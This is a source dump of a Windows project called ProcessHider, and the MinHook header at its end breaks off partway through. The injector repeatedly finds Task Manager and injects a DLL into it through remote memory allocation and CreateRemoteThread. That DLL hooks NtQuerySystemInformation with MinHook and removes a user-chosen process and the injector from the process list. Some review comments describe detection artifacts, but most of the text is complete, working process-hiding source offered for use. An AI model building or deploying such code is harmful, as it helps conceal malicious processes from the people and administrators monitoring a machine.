├── DLL_Injector ├── .gitignore ├── DLL_Injector.vcxproj ├── DLL_Injector.vcxproj.filters ├── DLL_Injector.vcxproj.user └── main.cpp ├── ProcessHider.sln ├── ProcessHider ├── .gitignore ├── ProcessHider.vcxproj ├── ProcessHider.vcxproj.filters ├── ProcessHider.vcxproj.user ├── main.cpp └── nt_structs.h ├── README.md └── include ├── .gitattributes ├── MinHook.h └── libMinHook.x64.lib /DLL_Injector/.gitignore: -------------------------------------------------------------------------------- 1 | /Debug 2 | /Release 3 | /x64 -------------------------------------------------------------------------------- /DLL_Injector/DLL_Injector.vcxproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | {8C2B26CA-DA93-4F3B-975C-9B1CFE8B2CC5} 23 | Win32Proj 24 | DLL_Injector 25 | 8.1 26 | 27 | 28 | 29 | Application 30 | true 31 | v140 32 | Unicode 33 | 34 | 35 | Application 36 | false 37 | v140 38 | true 39 | Unicode 40 | 41 | 42 | Application 43 | true 44 | v140 45 | Unicode 46 | 47 | 48 | Application 49 | false 50 | v140 51 | true 52 | Unicode 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | true 74 | 75 | 76 | true 77 | 78 | 79 | false 80 | 81 | 82 | false 83 | 84 | 85 | 86 | 87 | 88 | Level3 89 | Disabled 90 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 91 | true 92 | 93 | 94 | Console 95 | true 96 | 97 | 98 | 99 | 100 | 101 | 102 | Level3 103 | Disabled 104 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 105 | true 106 | 107 | 108 | Console 109 | true 110 | 111 | 112 | 113 | 114 | Level3 115 | 116 | 117 | MaxSpeed 118 | true 119 | true 120 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 121 | true 122 | 123 | 124 | Console 125 | true 126 | true 127 | true 128 | 129 | 130 | 131 | 132 | Level3 133 | 134 | 135 | MaxSpeed 136 | true 137 | true 138 
| NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 139 | true 140 | 141 | 142 | Console 143 | true 144 | true 145 | true 146 | 147 | 148 | 149 | 150 | 151 | 152 | 153 | 154 | -------------------------------------------------------------------------------- /DLL_Injector/DLL_Injector.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /DLL_Injector/DLL_Injector.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | -------------------------------------------------------------------------------- /DLL_Injector/main.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | using namespace std; 7 | HANDLE map; 8 | LPVOID buf; 9 | 10 | /* inject_dll(pid, dll_path): opens the target with PROCESS_ALL_ACCESS, allocates a PAGE_EXECUTE_READWRITE region in it (VirtualAllocEx), writes the DLL path there (WriteProcessMemory) and starts a remote thread at LoadLibraryA with that address as its argument. Returns false only when OpenProcess or VirtualAllocEx is reported as failed by the checks below. NOTE(review): from the defender side the observable events are the full-access cross-process handle open, the remote RWX allocation and the remote thread creation; these are commonly covered by EDR or Sysmon process-access and CreateRemoteThread telemetry - confirm coverage in your environment. */ bool inject_dll(DWORD pid, string dll_path) { 11 | 12 | HANDLE handle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid); 13 | if (handle == INVALID_HANDLE_VALUE) { 14 | cout << " [-] Open Process Failed" << endl; 15 | return false; 16 | } 17 | else { cout << " [+] Got a Handle to the Remote Process" << endl; } 18 | 19 | LPVOID address = VirtualAllocEx(handle, NULL, dll_path.length() , MEM_COMMIT | MEM_RESERVE, 20 | PAGE_EXECUTE_READWRITE); 21 | if (address == NULL) { 22 | cout << " [-] VirtualAllocEx Failed" << endl; 23 | return false; 24 | } 25 | 26 | bool res = WriteProcessMemory(handle, address, dll_path.c_str(), dll_path.length(), 0); 27 | if (!res) { 28 | cout << " [-] WriteProcessMemory Failed" 
<< endl; 29 | } 30 | if (CreateRemoteThread(handle, NULL, NULL, (LPTHREAD_START_ROUTINE)LoadLibraryA, (LPVOID)address, NULL, NULL) == INVALID_HANDLE_VALUE) { 31 | cout << " [-] CreateRemoteThread Failed" << endl; 32 | } 33 | else { cout << " [+] DLL Loaded Into Remote Process" << endl; } 34 | 35 | /* NOTE(review): this line is reached and printed even after the WriteProcessMemory or CreateRemoteThread failure messages above, so the console output alone does not show that the DLL was loaded. */ cout << " [+] Process Hidden" << endl << endl; 36 | CloseHandle(handle); 37 | return true; 38 | } 39 | 40 | /* find_and_inject: thread routine started from main. Derives <directory of this executable>\ProcessHider.dll from GetModuleFileNameA, then loops without end: each pass takes a Toolhelp32 process snapshot, calls inject_dll for every entry named Taskmgr.exe whose PID differs from lastpid, closes the snapshot and sleeps 1000 ms. NOTE(review): the resulting artifact is ProcessHider.dll, loaded from the directory of the injector, appearing among the modules of Taskmgr.exe shortly after each Task Manager start - an image-load or module-list check on Taskmgr.exe would surface it; confirm with your tooling. */ void find_and_inject() 41 | { 42 | char* dll_path_c = (char*)malloc(sizeof(char) * 3000); 43 | GetModuleFileNameA(NULL, dll_path_c, 3000); 44 | 45 | DWORD lastpid = 4; 46 | string dll_path(dll_path_c); 47 | size_t index = dll_path.find_last_of('\\'); 48 | dll_path.erase(dll_path.begin() + index, dll_path.end()); 49 | dll_path.append("\\ProcessHider.dll"); 50 | 51 | while (true) { // Keep running to check if TM closes and reopens, if yes then inject again 52 | PROCESSENTRY32 process; 53 | process.dwSize = sizeof(PROCESSENTRY32); 54 | 55 | HANDLE proc_snap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); 56 | if (proc_snap == INVALID_HANDLE_VALUE) { 57 | cout << " [-] CreateToolhelp32Snapshot Failed" << endl; 58 | return; 59 | } 60 | 61 | if (!Process32First(proc_snap, &process)) { 62 | cout << " [-] Process32First Failed" << endl; 63 | return; 64 | } 65 | 66 | do 67 | { 68 | if (!lstrcmp(process.szExeFile, L"Taskmgr.exe") && lastpid != process.th32ProcessID) { 69 | cout << " [+] Task Manager Detected" << endl; 70 | if (!inject_dll(process.th32ProcessID, dll_path)) { 71 | cout << " [-] Unable to Inject DLL!! 
Check if you are running as Admin" << endl << endl; 72 | break; 73 | } 74 | lastpid = process.th32ProcessID; 75 | } 76 | } while (Process32Next(proc_snap, &process)); 77 | CloseHandle(proc_snap); 78 | Sleep(1000); 79 | } 80 | } 81 | 82 | /* map_process_name: creates a 255-byte named section Global\GetProcessName with CreateFileMappingA (INVALID_HANDLE_VALUE as the file handle), maps a 255-byte view and copies the bytes of the process name into it. The handle and the view stay open in the globals map and buf until main handles quit. NOTE(review): the fixed object name is a host indicator that is present while the injector keeps the handle open. */ bool map_process_name(string process) { 83 | map = CreateFileMappingA( 84 | INVALID_HANDLE_VALUE, 85 | NULL, 86 | PAGE_READWRITE, 87 | 0, 88 | 255, 89 | "Global\\GetProcessName" 90 | ); 91 | 92 | if (map == NULL) { 93 | cout << "CreateFileMapping Failed" << endl; 94 | return false; 95 | } 96 | 97 | buf = MapViewOfFile(map, 98 | FILE_MAP_ALL_ACCESS, 99 | 0, 100 | 0, 101 | 255); 102 | 103 | if (buf == NULL) { 104 | cout << "MapViewOfFile Failed" << endl; 105 | CloseHandle(map); 106 | return 0; 107 | } 108 | 109 | CopyMemory(buf, process.c_str(), process.length()); 110 | } 111 | 112 | /* main: reads the process name to hide from stdin, publishes it through map_process_name (the return value is not checked), starts find_and_inject on a new thread, then keeps reading stdin until the word quit is entered, at which point it unmaps the view, closes the section handle and exits. */ int main() 113 | { 114 | string process, inp; 115 | cout << " Enter Process Name To Hide" << endl << "--> "; 116 | cin >> process; 117 | cout << endl; 118 | map_process_name(process); 119 | 120 | CreateThread( 121 | NULL, 122 | NULL, 123 | (LPTHREAD_START_ROUTINE)find_and_inject, 124 | NULL, 125 | NULL, 126 | NULL 127 | ); 128 | 129 | cout << "Enter \"quit\" to Quit or Keep this running to inject into future task manager processes" << endl << endl; 130 | while (true) { 131 | cin >> inp; 132 | if (inp == "quit") { 133 | UnmapViewOfFile(buf); 134 | CloseHandle(map); 135 | ExitProcess(0); 136 | } 137 | } 138 | 139 | return 0; 140 | } -------------------------------------------------------------------------------- /ProcessHider.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 14 4 | VisualStudioVersion = 14.0.25420.1 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ProcessHider", "ProcessHider\ProcessHider.vcxproj", "{EE6E876F-F989-4AC2-BA2F-55348E03519C}" 7 | EndProject 8 | 
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DLL_Injector", "DLL_Injector\DLL_Injector.vcxproj", "{8C2B26CA-DA93-4F3B-975C-9B1CFE8B2CC5}" 9 | EndProject 10 | Global 11 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 12 | Debug|x64 = Debug|x64 13 | Debug|x86 = Debug|x86 14 | Release|x64 = Release|x64 15 | Release|x86 = Release|x86 16 | EndGlobalSection 17 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 18 | {EE6E876F-F989-4AC2-BA2F-55348E03519C}.Debug|x64.ActiveCfg = Debug|x64 19 | {EE6E876F-F989-4AC2-BA2F-55348E03519C}.Debug|x64.Build.0 = Debug|x64 20 | {EE6E876F-F989-4AC2-BA2F-55348E03519C}.Debug|x86.ActiveCfg = Debug|Win32 21 | {EE6E876F-F989-4AC2-BA2F-55348E03519C}.Debug|x86.Build.0 = Debug|Win32 22 | {EE6E876F-F989-4AC2-BA2F-55348E03519C}.Release|x64.ActiveCfg = Release|x64 23 | {EE6E876F-F989-4AC2-BA2F-55348E03519C}.Release|x64.Build.0 = Release|x64 24 | {EE6E876F-F989-4AC2-BA2F-55348E03519C}.Release|x86.ActiveCfg = Release|Win32 25 | {EE6E876F-F989-4AC2-BA2F-55348E03519C}.Release|x86.Build.0 = Release|Win32 26 | {8C2B26CA-DA93-4F3B-975C-9B1CFE8B2CC5}.Debug|x64.ActiveCfg = Debug|x64 27 | {8C2B26CA-DA93-4F3B-975C-9B1CFE8B2CC5}.Debug|x64.Build.0 = Debug|x64 28 | {8C2B26CA-DA93-4F3B-975C-9B1CFE8B2CC5}.Debug|x86.ActiveCfg = Debug|Win32 29 | {8C2B26CA-DA93-4F3B-975C-9B1CFE8B2CC5}.Debug|x86.Build.0 = Debug|Win32 30 | {8C2B26CA-DA93-4F3B-975C-9B1CFE8B2CC5}.Release|x64.ActiveCfg = Release|x64 31 | {8C2B26CA-DA93-4F3B-975C-9B1CFE8B2CC5}.Release|x64.Build.0 = Release|x64 32 | {8C2B26CA-DA93-4F3B-975C-9B1CFE8B2CC5}.Release|x86.ActiveCfg = Release|Win32 33 | {8C2B26CA-DA93-4F3B-975C-9B1CFE8B2CC5}.Release|x86.Build.0 = Release|Win32 34 | EndGlobalSection 35 | GlobalSection(SolutionProperties) = preSolution 36 | HideSolutionNode = FALSE 37 | EndGlobalSection 38 | EndGlobal 39 | -------------------------------------------------------------------------------- /ProcessHider/.gitignore: 
-------------------------------------------------------------------------------- 1 | /Debug 2 | /Release 3 | /x64 -------------------------------------------------------------------------------- /ProcessHider/ProcessHider.vcxproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | {EE6E876F-F989-4AC2-BA2F-55348E03519C} 23 | Win32Proj 24 | ProcessHider 25 | 8.1 26 | 27 | 28 | 29 | DynamicLibrary 30 | true 31 | v140 32 | Unicode 33 | 34 | 35 | DynamicLibrary 36 | false 37 | v140 38 | true 39 | Unicode 40 | 41 | 42 | DynamicLibrary 43 | true 44 | v140 45 | Unicode 46 | 47 | 48 | DynamicLibrary 49 | false 50 | v140 51 | true 52 | Unicode 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | true 74 | 75 | 76 | true 77 | 78 | 79 | false 80 | 81 | 82 | false 83 | 84 | 85 | 86 | 87 | 88 | Level3 89 | Disabled 90 | WIN32;_DEBUG;_WINDOWS;_USRDLL;PROCESSHIDER_EXPORTS;%(PreprocessorDefinitions) 91 | true 92 | 93 | 94 | Windows 95 | true 96 | 97 | 98 | 99 | 100 | 101 | 102 | Level3 103 | Disabled 104 | _DEBUG;_WINDOWS;_USRDLL;PROCESSHIDER_EXPORTS;%(PreprocessorDefinitions) 105 | true 106 | 107 | 108 | Windows 109 | true 110 | 111 | 112 | 113 | 114 | Level3 115 | 116 | 117 | MaxSpeed 118 | true 119 | true 120 | WIN32;NDEBUG;_WINDOWS;_USRDLL;PROCESSHIDER_EXPORTS;%(PreprocessorDefinitions) 121 | true 122 | 123 | 124 | Windows 125 | true 126 | true 127 | true 128 | 129 | 130 | 131 | 132 | Level3 133 | 134 | 135 | MaxSpeed 136 | true 137 | true 138 | NDEBUG;_WINDOWS;_USRDLL;PROCESSHIDER_EXPORTS;%(PreprocessorDefinitions) 139 | true 140 | MultiThreaded 141 | 142 | 143 | Windows 144 | true 145 | true 146 | true 147 | ../include/libMinHook.x64.lib;%(AdditionalDependencies) 148 | 149 | 150 | 151 | 152 | 153 | 154 | 155 | 156 | 157 | 158 | 159 | 
-------------------------------------------------------------------------------- /ProcessHider/ProcessHider.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | 23 | 24 | Source Files 25 | 26 | 27 | -------------------------------------------------------------------------------- /ProcessHider/ProcessHider.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | -------------------------------------------------------------------------------- /ProcessHider/main.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include "..\include\MinHook.h" 3 | #include "nt_structs.h" 4 | 5 | #pragma comment(lib, "libMinHook.x64.lib") 6 | 7 | PNT_QUERY_SYSTEM_INFORMATION Original_NtQuerySystemInformation; 8 | PNT_QUERY_SYSTEM_INFORMATION New_NtQuerySystemInformation; 9 | wchar_t* process; 10 | 11 | /* Hooked_NtQuerySystemInformation: detour that set_nt_hook installs over NtQuerySystemInformation. It first calls the original through the MinHook trampoline (New_NtQuerySystemInformation). For SystemProcessInformation queries that returned 0 it then walks the returned records by NextEntryOffset and, for any record whose ImageName matches the global process or DLL_Injector.exe, extends the NextEntryOffset of the previous record past it (or sets it to 0 when the match is the last record). NOTE(review): only the result buffer handed to callers inside this process is changed; matching records are skipped over rather than overwritten, so their bytes remain in the buffer, and the first record is never compared because curr starts at the second one. */ NTSTATUS WINAPI Hooked_NtQuerySystemInformation( 12 | SYSTEM_INFORMATION_CLASS SystemInformationClass, 13 | PVOID SystemInformation, 14 | ULONG SystemInformationLength, 15 | PULONG ReturnLength) 16 | { 17 | NTSTATUS stat = New_NtQuerySystemInformation( 18 | SystemInformationClass, 19 | SystemInformation, 20 | SystemInformationLength, 21 | ReturnLength); 22 | 23 | if (SystemProcessInformation == SystemInformationClass && stat == 0) 24 | { 25 | P_SYSTEM_PROCESS_INFORMATION prev = P_SYSTEM_PROCESS_INFORMATION(SystemInformation); 26 | P_SYSTEM_PROCESS_INFORMATION curr = P_SYSTEM_PROCESS_INFORMATION((PUCHAR)prev + prev->NextEntryOffset); 27 | 28 | while 
(prev->NextEntryOffset != NULL) { 29 | if (!lstrcmp(curr->ImageName.Buffer, process)) { 30 | if (curr->NextEntryOffset == 0) { 31 | prev->NextEntryOffset = 0; // if above process is at last 32 | } 33 | else { 34 | prev->NextEntryOffset += curr->NextEntryOffset; 35 | } 36 | curr = prev; 37 | } 38 | if (!lstrcmp(curr->ImageName.Buffer, L"DLL_Injector.exe")) { 39 | if (curr->NextEntryOffset == 0) { 40 | prev->NextEntryOffset = 0; 41 | } 42 | else { 43 | prev->NextEntryOffset += curr->NextEntryOffset; 44 | } 45 | curr = prev; 46 | } 47 | prev = curr; 48 | curr = P_SYSTEM_PROCESS_INFORMATION((PUCHAR)curr + curr->NextEntryOffset); 49 | } 50 | } 51 | 52 | return stat; 53 | } 54 | 55 | /* set_nt_hook: resolves NtQuerySystemInformation in the already loaded ntdll.dll and uses MinHook (MH_Initialize, MH_CreateHook, MH_EnableHook) to redirect it to Hooked_NtQuerySystemInformation, storing the trampoline in New_NtQuerySystemInformation. Returns false as soon as one MinHook call does not return MH_OK. NOTE(review): MinHook presumably redirects the target by patching its code in memory, in which case the change shows up when the in-memory ntdll.dll of the host process is compared with the file on disk - confirm with your tooling. */ bool set_nt_hook() 56 | { 57 | HMODULE ntdll = GetModuleHandle(L"ntdll.dll"); 58 | 59 | Original_NtQuerySystemInformation = (PNT_QUERY_SYSTEM_INFORMATION)GetProcAddress(ntdll, "NtQuerySystemInformation"); 60 | 61 | if (MH_Initialize() != MH_OK) { return false; } 62 | 63 | if(MH_CreateHook(Original_NtQuerySystemInformation, &Hooked_NtQuerySystemInformation, 64 | (LPVOID*) &New_NtQuerySystemInformation) != MH_OK) { return false; } 65 | 66 | if (MH_EnableHook(Original_NtQuerySystemInformation) != MH_OK) { return false; } 67 | 68 | return true; 69 | } 70 | 71 | /* get_process_name: opens the named section Global\GetProcessName, maps 255 bytes of it, converts the contents from UTF-8 into a newly allocated buffer of 255 wchar_t stored in the global process, then unmaps the view and closes the handle. The results of OpenFileMappingA, MapViewOfFile and malloc are used without being checked. */ void get_process_name() { 72 | HANDLE map = OpenFileMappingA( 73 | FILE_MAP_ALL_ACCESS, 74 | FALSE, 75 | "Global\\GetProcessName" 76 | ); 77 | 78 | LPVOID buf = MapViewOfFile(map, // handle to map object 79 | FILE_MAP_ALL_ACCESS, // read/write permission 80 | 0, 81 | 0, 82 | 255); 83 | 84 | process = (wchar_t*)malloc(255 * sizeof(wchar_t)); 85 | MultiByteToWideChar(CP_UTF8, 0, (char*)buf, -1, process, 255); 86 | 87 | UnmapViewOfFile(buf); 88 | CloseHandle(map); 89 | } 90 | 91 | /* DllMain: on DLL_PROCESS_ATTACH installs the hook, returning FALSE if set_nt_hook fails, and then reads the name to hide with get_process_name; on DLL_PROCESS_DETACH disables the hook and uninitializes MinHook. Returns TRUE otherwise. */ BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved) 92 | { 93 | switch(fdwReason) 94 | { 95 | case DLL_PROCESS_ATTACH: 96 | if (!set_nt_hook()) { 97 | return FALSE; 98 | } 99 | get_process_name(); 100 | break; 101 | case DLL_PROCESS_DETACH: 
102 | MH_DisableHook(Original_NtQuerySystemInformation); 103 | MH_Uninitialize(); 104 | break; 105 | } 106 | 107 | return TRUE; 108 | } -------------------------------------------------------------------------------- /ProcessHider/nt_structs.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | 4 | /* Function-pointer type with the four-parameter signature used for NtQuerySystemInformation; main.cpp uses it for both the resolved export and the MinHook trampoline. */ typedef NTSTATUS(WINAPI *PNT_QUERY_SYSTEM_INFORMATION)( 5 | SYSTEM_INFORMATION_CLASS SystemInformationClass, 6 | PVOID SystemInformation, 7 | ULONG SystemInformationLength, 8 | PULONG ReturnLength 9 | ); 10 | 11 | /* Project-local declaration of one process record in the SystemProcessInformation result. The hook in main.cpp reads only NextEntryOffset and ImageName.Buffer. NOTE(review): the field layout is declared by hand in this header - verify it against the Windows build under analysis before relying on any other field. */ typedef struct __SYSTEM_PROCESS_INFORMATION { 12 | ULONG NextEntryOffset; 13 | ULONG NumberOfThreads; 14 | LARGE_INTEGER WorkingSetPrivateSize; 15 | ULONG HardFaultCount; 16 | ULONG NumberOfThreadsHighWatermark; 17 | ULONGLONG CycleTime; 18 | LARGE_INTEGER CreateTime; 19 | LARGE_INTEGER UserTime; 20 | LARGE_INTEGER KernelTime; 21 | UNICODE_STRING ImageName; 22 | LONG BasePriority; 23 | PVOID UniqueProcessId; 24 | PVOID InheritedFromUniqueProcessId; 25 | ULONG HandleCount; 26 | ULONG SessionId; 27 | ULONG_PTR UniqueProcessKey; 28 | ULONG_PTR PeakVirtualSize; 29 | ULONG_PTR VirtualSize; 30 | ULONG PageFaultCount; 31 | ULONG_PTR PeakWorkingSetSize; 32 | ULONG_PTR WorkingSetSize; 33 | ULONG_PTR QuotaPeakPagedPoolUsage; 34 | ULONG_PTR QuotaPagedPoolUsage; 35 | ULONG_PTR QuotaPeakNonPagedPoolUsage; 36 | ULONG_PTR QuotaNonPagedPoolUsage; 37 | ULONG_PTR PagefileUsage; 38 | ULONG_PTR PeakPagefileUsage; 39 | ULONG_PTR PrivatePageCount; 40 | LARGE_INTEGER ReadOperationCount; 41 | LARGE_INTEGER WriteOperationCount; 42 | LARGE_INTEGER OtherOperationCount; 43 | LARGE_INTEGER ReadTransferCount; 44 | LARGE_INTEGER WriteTransferCount; 45 | LARGE_INTEGER OtherTransferCount; 46 | } S_SYSTEM_PROCESS_INFORMATION, *P_SYSTEM_PROCESS_INFORMATION; -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | 
# ProcessHider 2 | 3 | Process Hider uses Windows API hooking to hide a process from Task Manager. It uses the MinHook library to hook the NtQuerySystemInformation function, so whenever Task Manager calls NtQuerySystemInformation our function runs and removes the chosen process from the process list returned by the original function. The hook exists only inside the Task Manager process that the DLL was injected into, so the process remains visible to any other tool that enumerates processes. 4 | 5 | There are two projects in the repo. The main one is ProcessHider, which produces the DLL that is injected into Task Manager. The second is the DLL injector, whose job is to inject the DLL and pass it the name of the process to hide. 6 | 7 | ## To Compile: 8 | ``` Clone the repo and open the solution file in Visual Studio``` 9 | -------------------------------------------------------------------------------- /include/.gitattributes: -------------------------------------------------------------------------------- 1 | *.h text 2 | *.lib binary 3 | -------------------------------------------------------------------------------- /include/MinHook.h: -------------------------------------------------------------------------------- 1 | /* 2 | * MinHook - The Minimalistic API Hooking Library for x64/x86 3 | * Copyright (C) 2009-2017 Tsuda Kageyu. 4 | * All rights reserved. 5 | * 6 | * Redistribution and use in source and binary forms, with or without 7 | * modification, are permitted provided that the following conditions 8 | * are met: 9 | * 10 | * 1. Redistributions of source code must retain the above copyright 11 | * notice, this list of conditions and the following disclaimer. 12 | * 2. Redistributions in binary form must reproduce the above copyright 13 | * notice, this list of conditions and the following disclaimer in the 14 | * documentation and/or other materials provided with the distribution. 
15 | * 16 | * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS 17 | * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED 18 | * TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A 19 | * PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER 20 | * OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, 21 | * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, 22 | * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR 23 | * PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF 24 | * LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING 25 | * NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS 26 | * SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 27 | */ 28 | 29 | #pragma once 30 | 31 | #if !(defined _M_IX86) && !(defined _M_X64) && !(defined __i386__) && !(defined __x86_64__) 32 | #error MinHook supports only x86 and x64 systems. 33 | #endif 34 | 35 | #include 36 | 37 | // MinHook Error Codes. 38 | typedef enum MH_STATUS 39 | { 40 | // Unknown error. Should not be returned. 41 | MH_UNKNOWN = -1, 42 | 43 | // Successful. 44 | MH_OK = 0, 45 | 46 | // MinHook is already initialized. 47 | MH_ERROR_ALREADY_INITIALIZED, 48 | 49 | // MinHook is not initialized yet, or already uninitialized. 50 | MH_ERROR_NOT_INITIALIZED, 51 | 52 | // The hook for the specified target function is already created. 53 | MH_ERROR_ALREADY_CREATED, 54 | 55 | // The hook for the specified target function is not created yet. 56 | MH_ERROR_NOT_CREATED, 57 | 58 | // The hook for the specified target function is already enabled. 59 | MH_ERROR_ENABLED, 60 | 61 | // The hook for the specified target function is not enabled yet, or already 62 | // disabled. 63 | MH_ERROR_DISABLED, 64 | 65 | // The specified pointer is invalid. It points the address of non-allocated 66 | // and/or non-executable region. 
67 | MH_ERROR_NOT_EXECUTABLE, 68 | 69 | // The specified target function cannot be hooked. 70 | MH_ERROR_UNSUPPORTED_FUNCTION, 71 | 72 | // Failed to allocate memory. 73 | MH_ERROR_MEMORY_ALLOC, 74 | 75 | // Failed to change the memory protection. 76 | MH_ERROR_MEMORY_PROTECT, 77 | 78 | // The specified module is not loaded. 79 | MH_ERROR_MODULE_NOT_FOUND, 80 | 81 | // The specified function is not found. 82 | MH_ERROR_FUNCTION_NOT_FOUND 83 | } 84 | MH_STATUS; 85 | 86 | // Can be passed as a parameter to MH_EnableHook, MH_DisableHook, 87 | // MH_QueueEnableHook or MH_QueueDisableHook. 88 | #define MH_ALL_HOOKS NULL 89 | 90 | #ifdef __cplusplus 91 | extern "C" { 92 | #endif 93 | 94 | // Initialize the MinHook library. You must call this function EXACTLY ONCE 95 | // at the beginning of your program. 96 | MH_STATUS WINAPI MH_Initialize(VOID); 97 | 98 | // Uninitialize the MinHook library. You must call this function EXACTLY 99 | // ONCE at the end of your program. 100 | MH_STATUS WINAPI MH_Uninitialize(VOID); 101 | 102 | // Creates a Hook for the specified target function, in disabled state. 103 | // Parameters: 104 | // pTarget [in] A pointer to the target function, which will be 105 | // overridden by the detour function. 106 | // pDetour [in] A pointer to the detour function, which will override 107 | // the target function. 108 | // ppOriginal [out] A pointer to the trampoline function, which will be 109 | // used to call the original target function. 110 | // This parameter can be NULL. 111 | MH_STATUS WINAPI MH_CreateHook(LPVOID pTarget, LPVOID pDetour, LPVOID *ppOriginal); 112 | 113 | // Creates a Hook for the specified API function, in disabled state. 114 | // Parameters: 115 | // pszModule [in] A pointer to the loaded module name which contains the 116 | // target function. 117 | // pszTarget [in] A pointer to the target function name, which will be 118 | // overridden by the detour function. 
119 | // pDetour [in] A pointer to the detour function, which will override 120 | // the target function. 121 | // ppOriginal [out] A pointer to the trampoline function, which will be 122 | // used to call the original target function. 123 | // This parameter can be NULL. 124 | MH_STATUS WINAPI MH_CreateHookApi( 125 | LPCWSTR pszModule, LPCSTR pszProcName, LPVOID pDetour, LPVOID *ppOriginal); 126 | 127 | // Creates a Hook for the specified API function, in disabled state. 128 | // Parameters: 129 | // pszModule [in] A pointer to the loaded module name which contains the 130 | // target function. 131 | // pszTarget [in] A pointer to the target function name, which will be 132 | // overridden by the detour function. 133 | // pDetour [in] A pointer to the detour function, which will override 134 | // the target function. 135 | // ppOriginal [out] A pointer to the trampoline function, which will be 136 | // used to call the original target function. 137 | // This parameter can be NULL. 138 | // ppTarget [out] A pointer to the target function, which will be used 139 | // with other functions. 140 | // This parameter can be NULL. 141 | MH_STATUS WINAPI MH_CreateHookApiEx( 142 | LPCWSTR pszModule, LPCSTR pszProcName, LPVOID pDetour, LPVOID *ppOriginal, LPVOID *ppTarget); 143 | 144 | // Removes an already created hook. 145 | // Parameters: 146 | // pTarget [in] A pointer to the target function. 147 | MH_STATUS WINAPI MH_RemoveHook(LPVOID pTarget); 148 | 149 | // Enables an already created hook. 150 | // Parameters: 151 | // pTarget [in] A pointer to the target function. 152 | // If this parameter is MH_ALL_HOOKS, all created hooks are 153 | // enabled in one go. 154 | MH_STATUS WINAPI MH_EnableHook(LPVOID pTarget); 155 | 156 | // Disables an already created hook. 157 | // Parameters: 158 | // pTarget [in] A pointer to the target function. 159 | // If this parameter is MH_ALL_HOOKS, all created hooks are 160 | // disabled in one go. 
